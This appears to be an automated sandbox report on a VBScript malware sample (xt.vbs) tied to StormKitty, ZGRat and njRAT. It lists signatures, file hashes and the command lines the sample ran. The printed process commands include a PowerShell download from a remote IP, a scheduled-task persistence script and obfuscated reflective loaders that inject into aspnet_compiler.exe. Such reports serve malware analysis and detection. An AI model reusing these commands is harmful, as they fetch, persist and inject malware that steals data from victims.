Analysis Overview
SHA256: 45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
Threat Level: Known bad
The file xt.vbs was found to be: Known bad.
Malicious Activity Summary
StormKitty
ZGRat
StormKitty payload
njRAT/Bladabindi
Detect ZGRat V1
Downloads MZ/PE file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-03-20 19:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-03-20 19:06
Reported: 2024-03-20 19:14
Platform: win7-20240221-en
Max time kernel: 361s
Max time network: 362s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 2784 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2024-03-20 19:06
Reported: 2024-03-20 19:18
Platform: win10v2004-20240226-en
Max time kernel: 600s
Max time network: 594s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
njRAT/Bladabindi
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5008 set thread context of 2572 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 3556 set thread context of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 1452 set thread context of 2320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 4984 set thread context of 4092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\get.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\get.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
Network
Files
memory/2388-5-0x0000015D511B0000-0x0000015D511D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2388-10-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/2388-11-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-12-0x0000015D512E0000-0x0000015D51306000-memory.dmp
memory/2388-13-0x0000015D51310000-0x0000015D51324000-memory.dmp
memory/2388-14-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/2388-15-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-16-0x0000015D50880000-0x0000015D50890000-memory.dmp
memory/2388-17-0x0000015D51370000-0x0000015D51382000-memory.dmp
memory/2388-18-0x0000015D50870000-0x0000015D5087A000-memory.dmp
C:\Users\Public\node_modules\async\reduce.js
| MD5 | 724bb52915e1158b4dff6f26ef4baf72 |
| SHA1 | ad0aa6a0ac5576433051167524923e6aa794c96a |
| SHA256 | f1e4594194164d2504946c85c8e983346b25f9be8239178defec27e912b56c21 |
| SHA512 | 657c3dec82c5c6c34accdbc9d96e2be59a592e60241960810f10a662f5305c21dcef8cf006fcdefb0d48d30ccdd30d9dd6c263c089a88591f18a83a2f390eaaa |
C:\Users\Public\node_modules\lodash\fp\property.js
| MD5 | ebb08110bff348df334274bd1d79e025 |
| SHA1 | 563c5eb1769785a3350bfd1cb2b4e090a650c994 |
| SHA256 | af3533640c8af8f6804e9df53cabeac7767cddf1a619236e7226a784a2e9101a |
| SHA512 | 5f613471f700f4d36a3847f694774f9db9b7ebafd5037c00268af6edbf762bdad13a713dda2f93ab5f02bb01e8cdde2d6919f33a1bd1d74899bf1bf130b3fc73 |
C:\Users\Public\node_modules\lodash\valueOf.js
| MD5 | 3b889e721c9c14f7a5cd312bb476f2a6 |
| SHA1 | dcaa02fb24d8915128f62a50e2782e30d7d4fe8e |
| SHA256 | 469f0f647beaf4eeca8d316133bcd0a0b3f5e55a4c1a391da1f10baba824ca9d |
| SHA512 | 3590cd3433b362223d3256d29a851a056c09d0fc0f4414d194cf39b64d166841dffd59f3029c352991682e9ee8e06fc97855fa1cefeb209098428dc5c2c7f953 |
C:\Users\Public\node_modules\zip-stream\LICENSE
| MD5 | 51478cb9e7ab40d3d3616c3794ded96b |
| SHA1 | 97caa58bbe0c8dcd3bd857dca51ab034344a71c1 |
| SHA256 | 79bad9f51738814f83251ae89460326b2ff2ea19ff5f71ab8f7636b2e17bb231 |
| SHA512 | e0eb64b4b3e53390e54487234f5dd7555e9a5871e9d1e901f5c0bdf8d9670b220731d2bf58c80e57a6e28e93fc7574ece6b4d449a13c51c05619bfa0bf2774e3 |
memory/2388-3007-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
C:\Users\Public\basta.js
| MD5 | 38affda935585ad2ddc0abe0a906f404 |
| SHA1 | 8379070ec3e9b448499c53c6244c815bc566cf59 |
| SHA256 | f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa |
| SHA512 | 0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6 |
C:\Users\Public\node.bat
| MD5 | 1beb518fe0cd85f2d6f9101c2e47c7ae |
| SHA1 | 65ab6ae5b983633f60a4404636c0de19b2c529fa |
| SHA256 | 81ae13af20a68b407c4171c498f5140f51d8f0d9cf5bf4ddcf989112e3d31297 |
| SHA512 | 880534df1232044cf1cfd5dc83a3d170eac46093c8f38b19e20967cb6b2c5020994d1f3113e72a4e73917ae6f9701c4a08f57f8ebec2471e35a9111362115d5b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e5ab5d093e49058a43f45f317b401e68 |
| SHA1 | 120da069a87aa9507d2b66c07e368753d3061c2d |
| SHA256 | 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74 |
| SHA512 | d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a |
memory/1440-3011-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/1440-3012-0x000002DBAA580000-0x000002DBAA590000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 176e06d925350cd4e4fe35470be810d9 |
| SHA1 | 60e4033d866f64faa490dad93552ec221a7c3db9 |
| SHA256 | 1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4 |
| SHA512 | 6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1 |
memory/1440-3023-0x000002DBAB0B0000-0x000002DBAB0D6000-memory.dmp
memory/1440-3024-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/1616-3025-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
memory/1616-3032-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp
memory/1616-3036-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp
memory/1616-3038-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp
C:\Users\Public\app.js
| MD5 | 3f5daf5315fe8b83fdc8a6d0265008b6 |
| SHA1 | 4a08dd25e8fbb547c23e888e3dd009910cdc3cc5 |
| SHA256 | 46286370fb97d1b63b3b9ee3b79e8bb0b5072d6e17d11470592e1e0d8586e0c6 |
| SHA512 | 93f2700a5e7d5e4b9da7aeb470d261f38a76a54f2bfeb08657bfc5a8f05ce3d583dda2790e441e62acc5de9594fe745f3ae0a6de74564776978c88aadeee86f8 |
C:\Users\Public\open.js
| MD5 | 3a6537ac98b7cdb20f6ea4f86a76704e |
| SHA1 | ff696860120a820dd728de2f33cb0d2b3d3abab5 |
